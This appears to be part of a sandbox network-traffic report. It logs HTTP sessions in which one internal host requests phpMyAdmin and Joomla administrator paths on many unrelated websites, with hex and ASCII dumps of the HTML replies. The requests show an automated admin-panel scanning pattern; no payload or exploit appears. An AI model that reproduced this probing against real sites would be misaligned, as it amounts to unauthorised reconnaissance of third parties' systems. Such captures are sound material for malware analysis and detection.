2023-12-22 20:14:58 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 Data Ascii: 1f40nt-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}</style><link rel='styles
2023-12-22 20:14:58 UTC	7822	IN	Data Raw: 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 20 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 20 3e 3c 66 65 46 75 6e 63 52 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 2e 35 34 39 30 31 39 36 30 37 38 34 33 31 34 20 30 2e 39 38 38 32 33 35 32 39 34 31 31 37 36 35 22 20 2f 3e 3c 66 65 46 75 6e 63 47 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 31 22 20 2f 3e 3c 66 65 46 75 6e 63 42 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 Data Ascii: .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues
2023-12-22 20:14:58 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:58 UTC	1382	IN	Data Raw: 35 35 66 0d 0a 2d 63 6f 6c 2d 78 73 2d 31 32 22 20 3e 0d 0a 09 09 09 09 09 09 09 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 32 33 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 20 7c 20 50 6f 77 65 72 65 64 20 62 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 20 3c 21 2d Data Ascii: 55f-col-xs-12" >Copyright 2023 <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span> \| Powered by <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span></div></div> <!-

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	60922	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	339	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:57 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:57 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Px8ZziIWc6wxA8ueMBYFuZlR7ccnMQUfbznGj+YJri0ZHXq2O++3bQpahx+oNJqpHFIXEQFIHEKawT5gZt9njw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:57 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	60914	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	327	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:57 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:57 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_cOssYUgkVlVpCyzf79b85CTK7WVF9MpxH+nr+U+NLSzbgo6u762lUTWvYnqEU4mgaCVSKO+kLGShaARFrYkjmA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:57 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	61009	104.24.82.4	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	191	OUT	GET /administrator/index.php HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:57 UTC	658	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: private, no-store x-request-id: d4f8dfae-35a5-4f0c-b52e-e611999554ce via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hA8gAFHmZ77NvXMh4YXjXAcM6fxnMb31lpSnBTwx1oWhnWqYYzKgbF6aO0ujo7UXeCpvBFeQTBCbnA2fgR3Y7%2Bl%2F7KkpS2a0FC0Wk7fE23koUbkDdHPP2XeKcL2JoL9fV9Mu2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08b93b2ddab9-MIA
2023-12-22 20:14:57 UTC	711	IN	Data Raw: 32 61 39 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 56 65 72 73 69 6f 6e 20 3d 20 22 63 68 61 6e 67 65 2d 6d 65 72 67 65 64 2d 6d 61 73 74 65 72 2d 31 36 39 38 38 2d 31 2d 39 36 33 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 55 72 6c 20 3d 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 5c 2f 76 32 5c 2f 69 6e 64 65 78 2e 70 68 70 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 3d 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 Data Ascii: 2a95<!doctype html><html class="no-js" lang="en"><head><script> window.AppVersion = "change-merged-master-16988-1-963"; window.AppUrl = "https:\/\/www.thenile.com.au\/v2\/index.php"; window.SiteEnvironment = "production"; window.Site
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 6b 65 79 3a 20 22 35 65 38 36 30 66 33 35 61 37 63 38 39 34 34 32 30 33 39 37 38 64 62 37 32 63 65 36 36 39 31 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 65 72 65 6e 64 65 72 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 6e 64 65 72 69 6e 67 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 6d 61 69 6e 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 5c 2f 76 32 5c 2f 69 6e 64 65 78 2e 70 68 70 22 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72 54 6f 6b 65 6e 3a 20 22 22 2c 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 77 69 6e Data Ascii: key: "5e860f35a7c8944203978db72ce66913", prerender: { rendering: false, domain: "https:\/\/www.thenile.com.au\/v2\/index.php" }, userToken: "", }; win
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 68 6f 6f 70 73 2e 2e 2e 20 74 68 61 74 20 70 61 67 65 20 64 6f 65 73 6e e2 80 99 74 20 65 78 69 73 74 2e 20 34 30 34 20 45 72 72 6f 72 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 69 6d 61 67 65 73 2e 74 68 65 6e 69 Data Ascii: </noscript><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title> Whoops... that page doesnt exist. 404 Error. </title><link rel="preconnect" href="//images.theni
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 6c 20 79 6f 75 72 20 6f 6e 6c 69 6e 65 20 73 68 6f 70 70 69 6e 67 20 6e 65 65 64 73 20 61 72 65 20 61 74 20 54 68 65 4e 69 6c 65 2e 63 6f 6d 2e 61 75 20 77 69 74 68 20 46 72 65 65 20 33 30 20 44 61 79 20 52 65 74 75 72 6e 73 21 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 73 74 72 69 70 65 2e 63 6f 6d 2f 76 33 2f 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6e 67 2d 61 70 70 3d 22 74 6e 41 70 70 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 43 6f 6d 6d 61 6e 64 42 75 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 6e 2d 68 65 61 64 65 72 20 63 6f 6c 6c 61 70 73 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6d 61 6c 6c 2d 33 Data Ascii: " content="All your online shopping needs are at TheNile.com.au with Free 30 Day Returns!"><script src="https://js.stripe.com/v3/"></script></head><body ng-app="tnApp" ng-controller="CommandBus"><div class="row tn-header collapse"><div class="small-3
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 2f 3e 0a 3c 70 61 74 68 20 73 74 72 6f 6b 65 3d 22 23 42 36 38 32 35 37 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 33 35 30 20 31 31 31 76 36 34 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 30 20 36 37 63 2d 37 20 39 2e 30 38 30 32 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 2d 31 33 2e 35 20 31 33 2e 31 31 35 38 73 34 20 31 2e 30 30 38 39 20 37 20 31 2e 30 30 38 39 63 30 20 30 2d 35 2e 35 20 37 2e 35 36 36 38 2d 31 34 20 31 30 2e 35 39 33 35 20 30 20 30 20 38 2e 35 20 32 2e 35 32 32 33 20 31 30 2e 35 20 32 2e 30 31 37 38 20 Data Ascii: oke-linejoin="round" /><path stroke="#B68257" stroke-width="10" stroke-linecap="round" stroke-linejoin="round" d="M350 111v64" /><path d="M350 67c-7 9.0802-13.5 13.1158-13.5 13.1158s4 1.0089 7 1.0089c0 0-5.5 7.5668-14 10.5935 0 0 8.5 2.5223 10.5 2.0178
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 6d 61 73 6b 3d 22 75 72 6c 28 23 61 29 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 35 37 20 37 33 63 2d 32 2e 31 36 37 20 31 2e 35 2d 31 30 2e 32 20 35 2d 31 39 20 35 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 32 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 31 20 38 34 2e 35 63 2d 33 20 32 2e 31 36 36 37 2d 31 36 2e 31 20 36 2e 38 2d 33 30 2e 35 20 36 22 20 73 74 72 6f 6b 65 3d 22 75 72 6c 28 23 70 61 69 6e 74 33 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 36 33 20 39 36 2e 35 63 2d 32 2e 38 33 33 20 33 2d 31 35 2e 33 20 38 2e 39 2d 33 36 2e 35 20 38 2e 35 22 20 73 74 Data Ascii: troke-width="2" stroke-linecap="round" mask="url(#a)"><path d="M357 73c-2.167 1.5-10.2 5-19 5" stroke="url(#paint2_linear)" /><path d="M361 84.5c-3 2.1667-16.1 6.8-30.5 6" stroke="url(#paint3_linear)" /><path d="M363 96.5c-2.833 3-15.3 8.9-36.5 8.5" st
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 32 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 34 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 31 35 22 20 63 79 3d 22 31 33 30 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 35 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 30 38 22 20 63 79 3d 22 31 35 32 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 36 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 39 33 22 20 63 79 3d 22 31 35 32 22 20 72 3d 22 32 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 70 61 69 6e 74 31 37 5f 6c 69 6e 65 61 72 29 22 20 2f 3e 0a 3c 64 65 66 73 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d Data Ascii: 2" r="2" fill="url(#paint14_linear)" /><circle cx="315" cy="130" r="2" fill="url(#paint15_linear)" /><circle cx="308" cy="152" r="2" fill="url(#paint16_linear)" /><circle cx="393" cy="152" r="2" fill="url(#paint17_linear)" /><defs><linearGradient id=
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 36 37 31 34 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 36 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 34 39 2e 32 35 22 20 79 31 3d 22 31 32 31 22 20 78 32 3d 22 33 34 39 2e 32 35 22 20 79 32 3d 22 31 33 36 2e 39 31 33 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 42 39 31 34 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 41 36 37 31 34 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 Data Ascii: p offset="1" stop-color="#FA6714" /></linearGradient><linearGradient id="paint6_linear" x1="349.25" y1="121" x2="349.25" y2="136.913" gradientUnits="userSpaceOnUse"><stop stop-color="#FAB914" /><stop offset="1" stop-color="#FA6714" /></linearGradient
2023-12-22 20:14:57 UTC	615	IN	Data Raw: 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 33 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 33 38 22 20 79 31 3d 22 38 31 22 20 78 32 3d 22 33 33 38 22 20 79 32 3d 22 38 35 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 34 Data Ascii: color="#0029FF" /></linearGradient><linearGradient id="paint13_linear" x1="338" y1="81" x2="338" y2="85" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint14
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 33 39 36 32 0d 0a 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 36 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 30 38 22 20 79 31 3d 22 31 35 30 22 20 78 32 3d 22 33 30 38 22 20 79 32 3d 22 31 35 34 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 41 33 46 46 22 20 2f 3e 0a 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 30 30 32 39 46 46 22 20 2f 3e 0a 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 37 5f 6c 69 6e 65 61 72 22 20 78 31 3d 22 33 39 33 22 20 79 31 3d 22 31 35 30 22 20 78 Data Ascii: 3962<linearGradient id="paint16_linear" x1="308" y1="150" x2="308" y2="154" gradientUnits="userSpaceOnUse"><stop stop-color="#00A3FF" /><stop offset="1" stop-color="#0029FF" /></linearGradient><linearGradient id="paint17_linear" x1="393" y1="150" x

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	60936	34.149.87.45	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	184	OUT	GET /phpmyadmin HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:57 UTC	922	IN	HTTP/1.1 404 Not Found Content-Length: 2929 Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276097.5641706370139231077 Cache-Control: public,max-age=0,must-revalidate Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:14:57 GMT Age: 3 X-Served-By: cache-dfw-kdfw8210153-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_42_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqe0L1PnLg6FLWqrGNmqNwAa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaljisb3AquZ75AMu3lSzmWH/bf8RAwRVMHlkGvQMWkFNuMRNRaVhJq43k38tPlVzdpQ==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:14:57 UTC	330	IN	Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
